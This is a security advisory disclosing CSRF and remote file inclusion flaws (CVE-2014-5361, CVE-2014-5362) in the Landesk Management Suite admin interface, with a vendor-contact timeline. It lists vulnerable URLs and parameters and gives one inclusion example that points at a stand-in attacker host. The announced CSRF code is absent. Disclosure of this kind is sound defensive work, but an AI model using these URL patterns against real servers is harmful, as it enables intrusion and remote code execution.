Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities Product: Landesk Management Suite Vulnerable Versions: 9.5 (and possible previous versions), 9.6 Tested Version: 9.5 Advisory Publication: 16/04/2015 Latest Update: 16/04/2015 Vulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829] CVE Reference: CVE-2014-5361, CVE-2014-5362 Credit: Alex Haynes Advisory Details: (1) Vendor & Product Description -------------------------------- Vendor: LANDESK Product & Version: Landesk Management Suite v9.5 Vendor URL & Download: http://www.landesk.com/products/management-suite/ Product Description: "Manage all your users’ multi-platform desktops and mobile devices. Integrate several IT disciplines into a single management experience that speeds software distribution, ensures software license compliance, simplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X." (2) Vulnerability Details: -------------------------- The admin interface of Landesk Management Suite can be exploited by Remote File Inclusion (RFI) and Cross-site Request forgery (CSRF) attacks. Proof of concept for CSRF [CVE-2014-5361]: ----------------------------------------- URL: https:///remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT Attack Pattern: Certain functionalities of landesk are vulnerable to cross-site request forgeries, which can be used to force users to, among other things, manipulate windows services and processes on host machines. Example code below:
Proof of concept for RFI [CVE-2014-5362]: ----------------------------------------- There are numerous URLs within the landesk management suite that can be used to call upon remote files due to the use of relative paths. This can be leveraged to introduce remote file inclusion vulnerabilities as you can present external content through the landesk server. URLs: https:///ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=// https:///remote/frm_coremainfrm.aspx?tb=cust_qry.tb&d=//&bfn=swd_top&node=4&baseType=group1&groupID=1646&groupType=null&ownerID=56 https:///remote/frm_splitfrm.aspx?top=//&ttb=dirman.tb&ftr=frm_tasktabsfrm&tabf=dirman_tabs&tf=dirman_top&bottom=frm_taskfrm&bbd=SoftwareDistribution/ldaplist&bf=dirlist_bottom&bd=frm_coremainfrm&btb=dirlist.tb&pct=50 Parameter names: "d" & "top" Parameter Type: GET Attack Pattern: The Remote File must finish in .aspx but the extension is not referenced explicitly in the URL. It will be fetched in HTTPS. d=///(.aspx) example: https:///ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//evilsite.com/myevilaspxfile (3) Advisory Timeline: ---------------------- 15/09/2014 - First Contact 23/10/2014 - Request for update on fix. No ETA given. 21/11/2014 - Request for update on fix. No ETA given. 22/12/2014 - Request for update on fix. No ETA given. 22/01/2015 - Request for update on fix. No ETA given. 13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix. 16/04/2015 - Public disclosure (4)Solution: ------------ No fix at this time. (5) Credits: ------------ Discovered by Alex Haynes References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362